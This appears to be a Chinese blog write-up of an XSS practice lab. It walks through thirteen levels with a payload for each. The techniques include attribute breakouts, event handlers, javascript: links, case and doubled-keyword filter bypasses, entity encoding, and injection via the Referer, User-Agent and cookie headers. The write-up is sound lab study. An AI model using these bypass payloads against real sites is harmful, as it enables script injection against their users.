Web安全-XSS-基础06

第一关

在这里插入图片描述

第二关

在这里插入图片描述
input标签的属性值value中,闭合">,构建payload

"><script>alert(123)<script>

在这里插入图片描述

第三关

查看网页源代码,需要闭合单引号>
在这里插入图片描述
构建payload:

'><script>alert(1)</script>

发现<>被实体化了

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

payload:

' οnmοuseοver='alert(123)'
' οnmοusemοve='alert(123)'

在这里插入图片描述

第四关

<>被过滤了

在这里插入图片描述
构建payload:

" οnmοusemοve="alert(123)

在这里插入图片描述

第五关

payload:

">123acada<script>alert(1)</script>

发现script中间被加上了一个杠

在这里插入图片描述
尝试鼠标事件:

" onmousemove='alert(123)'

依旧被添加了_
在这里插入图片描述
尝试js伪协议
就是使用a标签的href来运行javascript的方法
这里的script没有被过滤!

"> <a href=javascript:alert('xss') > xss</a> 

在这里插入图片描述

第六关

script,on开头,以及href都被限制了
在这里插入图片描述到这里我才突然想起来大小写绕过。。。。。。。。。。。之前的应该也可以这样:
payload:

"><ScRipt>alert(1)</script>

在这里插入图片描述

第七关

script被过滤!
在这里插入图片描述
尝试双写绕过:
payload:

"><scscriptript>alert(1)</scscriptript>

在这里插入图片描述

第八关

可以添加友情链接,enmm尝试JAVASCRIPT伪协议

在这里插入图片描述javascript:alert(1)

被限制了
在这里插入图片描述尝试大小写:

javaScRipt:alert(1)

还是无法绕过。
尝试编码绕过:

javascript:alert(1)

直接把scirpt转成实体&#115;&#99;&#114;&#105;&#112;&#116;
payload:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)

在这里插入图片描述

第九关

第九关跟第八关相比多了一个判断,判断链接是否合法

if(false===strpos($str7,'http://'))
 
{
 
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
 
 }

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://xss')

在这里插入图片描述

第十关

没有头绪,查看源代码会发现有三个input标签,看来是通过t_sort来传递参数的,但标签都被隐藏了,只能我们自己构造按钮,触发事件

在这里插入图片描述
payload:

&t_sort="123" type="text" onclick="alert('xss')

在这里插入图片描述

第十一关

查看源代码:
发现多了一个$str11=$_SERVER['HTTP_REFERER'];
referer传参

在这里插入图片描述看来需要自己添加referer头,添加的值绘被传入t_ref

在这里插入图片描述

构造payload1:
创建一个按钮,点击可以触发xss

referer: click me!" type="button" οnclick="alert(xss)

在这里插入图片描述
payload2:
创建一个文本框,鼠标移动上即可触发xss

referer:123" type="text" οnmοuseοver="alert('123')

在这里插入图片描述

第十二关

在这里插入图片描述
UA处注入即可,构建payload:

click me!" type="button" οnclick="alert('xss')

在这里插入图片描述

在这里插入图片描述

第十三关

cookie处注入
payload同上
在这里插入图片描述

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全是指保护Web应用程序和Web服务器免受各种安全威胁和攻击的一门技术。你是一个零基础的入门学习者,以下是一些建议: 1. 学习基础知识:首先,你需要了解Web的基本工作原理和常见的Web安全威胁。你可以学习关于HTTP协议、URL编码、会话管理和身份验证等方面的知识。 2. 学习常见攻击手法:了解常见的Web安全攻击手法,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。这些攻击手法是黑客常用的手段,通过学习它们,你可以更好地了解如何预防和应对这些攻击。 3. 实践漏洞挖掘与修复:通过搭建实验环境,学习如何发现和利用常见的Web漏洞,如SQL注入和XSS。然后学习如何修复这些漏洞,加强Web应用程序的安全性。 4. 了解Web应用防火墙(WAF):WAF是一种用于防御Web攻击的安全设备,它可以检测和阻止恶意请求。学习WAF的工作原理和配置,可以帮助你更好地了解如何保护Web应用程序免受攻击。 5. 学习安全产品和工具:了解一些常见的安全产品和工具,如IDS/IPS、WAF、数据库网关等。这些工具可以帮助你监测和防御Web攻击,提高系统的安全性。 总之,学习Web安全需要理论知识的积累和实践经验的积累。通过学习常见的攻击手法、实践漏洞挖掘与修复以及了解安全产品和工具,你可以逐步提升自己的Web安全技能和知识。引用<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(2023版)零基础入门网络安全/Web安全,收藏这一篇就够了](https://blog.csdn.net/2301_76168381/article/details/129266018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值